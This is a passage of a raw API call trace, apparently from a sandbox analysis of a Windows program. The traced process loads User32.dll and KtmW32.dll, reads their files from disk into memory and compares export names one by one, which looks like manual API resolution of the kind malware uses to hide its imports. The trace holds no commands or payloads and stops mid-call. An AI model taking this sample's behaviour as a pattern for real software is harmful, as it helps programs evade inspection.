lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0178.399] GetProcessHeap () returned 0x580000 [0178.399] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2cf5030 | out: hHeap=0x580000) returned 1 [0178.399] GetProcessHeap () returned 0x580000 [0178.399] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x599140 [0178.399] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0178.399] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0178.399] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0178.399] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0178.400] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0178.400] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0178.400] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0178.400] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0178.400] GetProcessHeap () returned 0x580000 [0178.400] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1555b8) returned 0x40bf040 [0178.404] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0178.404] ReadFile (in: hFile=0x17c, lpBuffer=0x40bf040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40bf040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0178.563] CloseHandle (hObject=0x17c) returned 1 [0178.563] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0178.563] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0178.563] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0178.564] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0178.564] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0178.564] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0178.564] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0178.564] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0178.564] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0178.564] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0178.564] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0178.564] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0178.564] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0178.564] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0178.564] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0178.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0178.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0178.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0178.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0178.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0178.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0178.564] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0178.564] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0178.564] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0178.564] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0178.565] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0178.565] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0178.565] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0178.565] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0178.565] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0178.565] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0178.565] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0178.565] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0178.565] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0178.565] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0178.565] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0178.565] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0178.565] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0178.565] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0178.565] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0178.565] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0178.565] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0178.565] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0178.565] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0178.565] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0178.566] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0178.566] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0178.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0178.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0178.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0178.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0178.567] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0178.567] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0178.567] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0178.567] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0178.567] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0178.567] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0178.567] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0178.567] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0178.567] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0178.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0178.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0178.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0178.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0178.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0178.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0178.568] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0178.568] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0178.568] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0178.568] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0178.568] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0178.568] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0178.568] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0178.568] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0178.568] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0178.568] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0178.568] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0178.568] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0178.569] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0178.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0178.570] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0178.570] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0178.570] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0178.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0178.572] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0178.573] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0178.574] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0179.333] GetProcessHeap () returned 0x580000 [0179.333] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x40bf040 | out: hHeap=0x580000) returned 1 [0179.340] GetProcessHeap () returned 0x580000 [0179.340] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x5990c0 [0179.340] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0179.344] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0179.344] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0179.344] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0179.345] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0179.345] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0179.346] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0179.346] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0179.346] GetProcessHeap () returned 0x580000 [0179.346] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x5e00) returned 0x2cf5030 [0179.346] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0179.346] ReadFile (in: hFile=0x17c, lpBuffer=0x2cf5030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cf5030*, 